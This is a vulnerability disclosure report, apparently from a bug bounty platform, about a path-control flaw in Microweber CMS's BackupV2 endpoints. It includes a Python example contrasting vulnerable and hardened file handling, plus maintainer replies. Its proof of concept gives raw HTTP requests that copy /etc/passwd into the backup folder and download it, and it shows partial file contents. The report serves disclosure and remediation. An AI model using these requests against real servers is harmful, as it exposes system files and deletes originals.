External Control of File Name or Path in microweber/microweber
Reported on
Jan 29th 2022
Description
In the Microweber CMS, two endpoints can be combined to obtain a local file inclusion vulnerability.
- /api/BackupV2/upload?src=/etc/passwd
- /api/BackupV2/download?file=passwd
When logged in as administrator, we can upload any readable file from the operating system into the backups folder. The backup files are located in /var/www/microweber/storage/backup_content/.
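The root cause described above is that `src` is resolved as an arbitrary filesystem path and `file` is resolved relative to the backup folder without any containment check. The following is an added example, not code from the Microweber project, showing a vulnerable import routine beside a hardened one. It assumes an application-owned upload directory (`UPLOAD_DIR`, a constructed name) as the only location `src` may point to, and it uses temporary directories and a constructed stand-in for `/etc/passwd` so it runs offline:

```python
import os
import tempfile

# Constructed layout for the example: a backup folder, an upload folder that is the
# only legitimate source for backups, and a file standing in for /etc/passwd.
ROOT = tempfile.mkdtemp()
BACKUP_DIR = os.path.join(ROOT, "storage", "backup_content")
UPLOAD_DIR = os.path.join(ROOT, "storage", "uploads")  # assumed allowed source area
os.makedirs(BACKUP_DIR)
os.makedirs(UPLOAD_DIR)

SITE_ZIP = os.path.join(UPLOAD_DIR, "site.zip")        # a legitimate backup source
FAKE_PASSWD = os.path.join(ROOT, "passwd")             # stand-in for /etc/passwd
with open(SITE_ZIP, "wb") as f:
    f.write(b"PK\x03\x04constructed-archive")
with open(FAKE_PASSWD, "w") as f:
    f.write("root:x:0:0:root:/root:/bin/bash\n")


def contained(candidate: str, base: str) -> bool:
    """True only if the fully resolved candidate lies strictly inside base.

    realpath() resolves '..' components and symlinks, so a path that merely
    starts with the base string (e.g. 'storage/backup_content/../passwd')
    is still rejected."""
    base_real = os.path.realpath(base)
    cand_real = os.path.realpath(candidate)
    return (os.path.commonpath([base_real, cand_real]) == base_real
            and cand_real != base_real)


def unsafe_upload(src: str) -> str:
    """Models the reported behaviour: any readable path is accepted, copied into
    the backup folder under its basename, and the original is then deleted."""
    dest = os.path.join(BACKUP_DIR, os.path.basename(src))
    with open(src, "rb") as i, open(dest, "wb") as o:
        o.write(i.read())
    os.remove(src)  # this is what makes the flaw destructive as well as disclosing
    return dest


def safe_upload(src: str) -> str:
    """Hardened variant: 'src' must resolve inside UPLOAD_DIR, and the source
    file is copied rather than moved so nothing outside the backup folder changes."""
    if not contained(src, UPLOAD_DIR):
        raise PermissionError("src must be a file inside the upload directory")
    dest = os.path.join(BACKUP_DIR, os.path.basename(src))
    with open(src, "rb") as i, open(dest, "wb") as o:
        o.write(i.read())
    return dest


def safe_download(name: str) -> bytes:
    """'file' is treated as a bare file name: any separator or traversal
    component is rejected before the path is even joined."""
    if name in ("", ".", "..") or name != os.path.basename(name):
        raise ValueError("file must be a plain file name")
    path = os.path.join(BACKUP_DIR, name)
    if not contained(path, BACKUP_DIR) or not os.path.isfile(path):
        raise FileNotFoundError(name)
    with open(path, "rb") as f:
        return f.read()


if __name__ == "__main__":
    print("stored:", safe_upload(SITE_ZIP))
    print("served:", safe_download("site.zip")[:4])
    for label, call in (("src=/etc/passwd", lambda: safe_upload(FAKE_PASSWD)),
                        ("file=../passwd", lambda: safe_download("../passwd"))):
        try:
            call()
        except (PermissionError, ValueError) as exc:
            print("rejected", label, "->", exc)
```

The two checks are deliberately different: for the upload side the parameter is a path, so the fix is to resolve it and require containment in an allowed directory; for the download side the parameter should never have been a path at all, so it is reduced to a file name before any filesystem call. Copying instead of moving removes the file-loss impact described in this report.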
Proof of Concept
- Upload /etc/passwd file into the backups folder.
GET /api/BackupV2/upload?src=/etc/passwd HTTP/1.1
Host: 192.168.188.132
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://192.168.188.132/admin/view:modules/load_module:admin__backup_v2
Cookie: -- snippet --
- Read the file from the backups folder.
GET /api/BackupV2/download?file=passwd HTTP/1.1
Host: 192.168.188.132
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://192.168.188.132/admin/view:modules/load_module:admin__backup_v2
Cookie: -- snippet --
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
-- snippet --
Impact
This vulnerability provides local file inclusion and can be used to gain access to the server when chained with other vulnerabilities. Additionally, the original file is deleted after it is uploaded, so files can be lost: deleting any file in the webroot can cause the web application to stop responding to HTTP requests.
Our automated notification system will continue to reach out to the maintainers. Please get in touch with us once the report has gone stale, and we will manually reach out to the maintainers on your behalf ♥️
Hello, this issue has been fixed, thanks for the report
@maintainer Hello Peter, the commit does not seem to be the solution.
https://github.com/microweber/microweber/commit/98d025467128ecc24195dcb56c533febc3c91af6
https://github.com/microweber/microweber/commit/572bdc36b5b47923790016f6b961c8df53226855